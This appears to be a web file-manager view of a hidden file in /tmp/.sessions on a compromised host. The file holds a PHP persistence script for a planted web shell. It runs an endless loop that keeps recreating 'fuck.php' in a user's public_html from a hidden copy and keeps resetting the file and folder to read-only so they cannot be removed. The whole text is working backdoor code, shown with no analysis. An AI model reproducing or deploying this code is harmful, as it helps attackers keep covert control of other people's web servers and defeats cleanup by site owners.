ok
Direktori : /tmp/.sessions/ |
Current File : //tmp/.sessions/.L2hvbWUvaW1wb3J0Zm8vcHVibGljX2h0bWxmdWNrLWhhbmRsZXI= |
<?php @ini_set("max_execution_time", 0); while (True){ if (!file_exists("/home/importfo/public_html")){ mkdir("/home/importfo/public_html"); } if (!file_exists("/home/importfo/public_html/fuck.php")){ $text = base64_encode(file_get_contents("/tmp/.sessions/.L2hvbWUvaW1wb3J0Zm8vcHVibGljX2h0bWxmdWNrLXRleHQtZmlsZQ==")); file_put_contents("/home/importfo/public_html/fuck.php", base64_decode($text)); } if (gecko_perm("/home/importfo/public_html/fuck.php") != 0444){ chmod("/home/importfo/public_html/fuck.php", 0444); } if (gecko_perm("/home/importfo/public_html") != 0555){ chmod("/home/importfo/public_html", 0555); } } function gecko_perm($flename){ return substr(sprintf("%o", fileperms($flename)), -4); }